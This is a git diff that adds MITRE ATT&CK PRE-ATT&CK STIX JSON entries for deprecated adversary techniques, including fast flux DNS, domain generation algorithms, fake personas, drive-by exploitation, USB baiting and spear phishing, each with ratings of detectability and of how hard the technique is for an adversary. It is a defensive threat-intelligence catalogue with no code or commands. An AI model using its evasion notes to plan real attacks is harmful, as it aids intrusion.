@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--c2fe1ae2-164f-45bb-975b-524994ea93e1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Fast Flux DNS", + "description": "**This technique has been deprecated. Please use [Fast Flux DNS](https://attack.mitre.org/techniques/T1568/001).**\n\nA technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round robin IP address and short Time-To-Live (TTL) for a DNS resource record. (Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1325", + "url": "https://attack.mitre.org/techniques/T1325" + }, + { + "description": "Jamie Riden. (2008, August 16). HOW FAST-FLUX SERVICE NETWORKS WORK. Retrieved March 6, 2017.", + "source_name": "HoneynetFastFlux" + }, + { + "description": "Misnomer. (2012, May 4). RESEARCH TO DETECTION \u2013 IDENTIFY FAST FLUX IN YOUR ENVIRONMENT. Retrieved March 6, 2017.", + "source_name": "MisnomerFastFlux" + }, + { + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref", + "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", + "source_name": "MehtaFastFluxPt1" + }, + { + "source_name": "MehtaFastFluxPt2", + "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. 
Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:06:03.611Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true, + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1102", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Fast flux is generally simple for an adversary to set up and offers several advantages. Such advantages include limited audit trails for defenders to find, ease of operation for an adversary to maintain, and support for main nodes.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as IPS, domain registrars, and service providers are likely in the best position for detection.", + "x_mitre_detectable_by_common_defenses": "Partial" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--271e6d40-e191-421a-8f87-a8102452c201.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--271e6d40-e191-421a-8f87-a8102452c201.json new file mode 100644 index 0000000000000000000000000000000000000000..b3b5a27a620063cc0aac0274fefa18927b0a3e37 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--271e6d40-e191-421a-8f87-a8102452c201.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--9dec5fb5-4d65-4f70-94a9-5a6326ca13f7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop social network persona digital footprint", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1342).\n\nBoth newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1342", + "external_id": "T1342" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + }, + { + "source_name": "RobinSageInterview", + "description": "Joan Goodchild. (2010, July 8). The Robin Sage experiment: Fake profile fools security pros. Retrieved March 6, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1119", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "The only difference between an adversary conducting this technique and a typical user, is the adversary's intent - to target an individual for compromise.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe.json new file mode 100644 index 0000000000000000000000000000000000000000..e1e267eeee18161cd53f2fcbd8b7613aa902e044 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--78501561-0c2d-42d1-a532-9e197a910a49", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms (DGA)", + "description": "**This technique has been deprecated. Please use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002).**\n\nThe use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. (Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1323", + "url": "https://attack.mitre.org/techniques/T1323" + }, + { + "description": "Damballa Day Before Zero Blog. (2012, March 5). Domain Generation Algorithms (DGA) in Stealthy Malware. Retrieved March 6, 2017.", + "source_name": "DamballaDGA" + }, + { + "description": "Damballa. (n.d.). DGAs in the Hands of Cyber-Criminals Examining The State Of The Art In Malware Evasion Techniques. Retrieved March 6, 2017.", + "source_name": "DambballaDGACyberCriminals" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:06:00.117Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": true, + "x_mitre_old_attack_id": "PRE-T1100", + "x_mitre_version": "2.0", + "x_mitre_difficulty_for_adversary_explanation": "This technique does not require a significant amount of sophistication while still being highly effective. 
It was popularized by the Conficker worms but is prevalent in crimeware such as Murofet and BankPatch.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "It is possible to detect the use of DGAs; however, defenders have largely not been successful at mitigating the domains because they are generally registered less than an hour before they are used and disposed of within 24 hours.", + "x_mitre_detectable_by_common_defenses": "Partial" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768.json new file mode 100644 index 0000000000000000000000000000000000000000..0dbdc307b9903a0ba63c4a471e71b0c5be39af89 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--4785170f-f9a4-4b9a-8841-44bf2673d9f7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain/re-use payloads", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1346).\n\nA payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1346", + "external_id": "T1346" + }, + { + "source_name": "SonyDestover", + "description": "Kurt Baumgartner. (2014, December 4). Sony/Destover: mystery North Korean actor\u2019s destructive and past network activity. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but detecting an adversary acquiring a payload would require the defender to be monitoring the code repository where the payload is stored. 
If the adversary re-uses payloads, this allows the defender to create signatures to detect using these known indicators of compromise (e.g., hashes).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1123", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--286cc500-4291-45c2-99a1-e760db176402.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--286cc500-4291-45c2-99a1-e760db176402.json new file mode 100644 index 0000000000000000000000000000000000000000..2ee5f9fac775826f5fd0d4c3fce9134b29d653e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--286cc500-4291-45c2-99a1-e760db176402.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--09237a38-5c4d-46a5-9879-d0a044b58a48", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1307", + "external_id": "T1307" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. 
To add degrees of separation, they can buy or rent from another adversary or accomplice.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1084", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca.json new file mode 100644 index 0000000000000000000000000000000000000000..0d374f891321975cabaa398d17b591628705bf9a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--56594e49-515d-4102-b40e-c1746c67dfc0", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify web defensive services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1256).\n\nAn adversary can attempt to identify web defensive services as [CloudFlare](https://www.cloudflare.com), [IPBan](https://github.com/jjxtra/Windows-IP-Ban-Service), and [Snort](https://www.snort.org). This may be done by passively detecting services, like [CloudFlare](https://www.cloudflare.com) routing, or actively, such as by purposefully tripping security defenses. (Citation: NMAP WAF NSE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1256", + "external_id": "T1256" + }, + { + "source_name": "NMAP WAF NSE", + "description": "Paulino Calderon. (n.d.). http-waf-detect. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Active service detection may trigger an alert. 
Passive service enumeration is not detected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary can passively detect services (e.g., [https://www.cloudflare.com/ CloudFlare] routing) or actively detect services (e.g., by purposefully tripping security defenses)", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1033", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a.json new file mode 100644 index 0000000000000000000000000000000000000000..cbb5a7ee0fdbac37043b8221d7e225b930fc6bb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7cc6c4d4-a009-428f-b9d8-dd1619e3f626", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1266).\n\nOpen source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1266", + "external_id": "T1266" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Possible to gather digital intelligence about a person is easily aided by social networking sites, free/for fee people search engines, and publicly available information (e.g., county databases on tickets/DUIs).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1043", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9.json new file mode 100644 index 0000000000000000000000000000000000000000..4d2edbcc3056096ca08bc3fc59c4d07ca6c2b02a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--5da2b4d6-bb52-497c-8ba6-16b27b832433", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Leverage compromised 3rd party resources", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nThe utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1375", + "url": "https://attack.mitre.org/techniques/T1375" + }, + { + "description": "Bill Marczak, Jakub Dalek, John Scott-Railton, Ron Deibert, Sarah McKune. (2015, April 10). China\u2019s Great Cannon. 
Retrieved March 9, 2017.", + "source_name": "CitizenLabGreatCannon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:21:59.520Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1152", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Conducting technique requires either nation-state level capabilities or large amounts of financing to coordinate multiple 3rd party resources to gain desired insight.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "While possible to detect, it requires a broader vantage point than is typical that provides increased insight and conducts extensive data analysis and correlation between events.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af.json new file mode 100644 index 0000000000000000000000000000000000000000..4e50a6cc37804582cf9d6de7e86ea9fecbd272f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--8816a3d1-495c-4040-9160-05b530b387f8", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Untargeted client-side exploitation", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on an often widely used public web site intended for drive-by delivery to whomever visits the site. (Citation: CitizenLabGreatCannon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1370", + "url": "https://attack.mitre.org/techniques/T1370" + }, + { + "description": "Bill Marczak, Jakub Dalek, John Scott-Railton, Ron Deibert, Sarah McKune. (2015, April 10). China\u2019s Great Cannon. Retrieved March 9, 2017.", + "source_name": "CitizenLabGreatCannon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:30:45.039Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1147", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defensive technologies exist to scan web content before delivery to the requested end user. 
However, this is not fool proof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412.json new file mode 100644 index 0000000000000000000000000000000000000000..a3e397b510dd019582419f7d531c3ed195ae9e6b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--b1efae58-e72b-42e2-9cc8-e01ff7ab0086", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Disseminate removable media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1379).\n\nRemovable media containing malware can be injected in to a supply chain at large or small scale. It can also be physically placed for someone to find or can be sent to someone in a more targeted manner. The intent is to have the user utilize the removable media on a system where the adversary is trying to gain access. (Citation: USBMalwareAttacks) (Citation: FPDefendNewDomain) (Citation: ParkingLotUSB)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1379", + "external_id": "T1379" + }, + { + "source_name": "USBMalwareAttacks", + "description": "Sean Carroll. (2010, November 4). USB Malware Attacks On the Rise. Retrieved March 9, 2017." + }, + { + "source_name": "FPDefendNewDomain", + "description": "William J. Lynn III. (2010, September). Defending a New Domain. Retrieved March 9, 2017." + }, + { + "source_name": "ParkingLotUSB", + "description": "Emil Protalinski. (2012, July 11). Criminals push malware by 'losing' USB sticks in parking lots. Retrieved March 9, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "From a technical perspective, detection of an adversary disseminating removable media is not possible as there is no technical element involved until the compromise phase. Most facilities generally do not perform extensive physical security patrols, which would be necessary in order to promptly identify an adversary deploying removable media to be used in an attack.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique by penetration testers to gain access to networks via end users who are innately trusting of newly found or available technology.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1156", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17.json new file mode 100644 index 0000000000000000000000000000000000000000..b0cc8394540b60b09c3125f3fac9b52fb2125e88 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17.json 
@@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--b9d93568-a65f-4769-b59f-b8cf110992af", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2fc04aa5-48c1-49ec-919a-b88241ef1d17", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Spear phishing messages with text only", + "description": "**This technique has been deprecated. Please use [Phishing](https://attack.mitre.org/techniques/T1566) where appropriate.**\n\nEmails with text only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm existence of an account or user. (Citation: Paypal Phone Scam)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1368", + "url": "https://attack.mitre.org/techniques/T1368" + }, + { + "description": "Sophos Labs. (2006, July 7). PayPal phone phish scam uses voice recording to steal money. 
Retrieved March 29, 2017.", + "source_name": "Paypal Phone Scam" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:26:25.555Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1145", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Sending messages with text only should be accepted in most cases (e.g., not being filtered based on source, content).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "End user training and awareness is the primary defense for flagging a plain text email so the end user does not respond or take any requested action (e.g., calling a designated number).", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f.json new file mode 100644 index 0000000000000000000000000000000000000000..a7d6dfaccbce569bbb20a710593e84e60facb23e --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f.json 
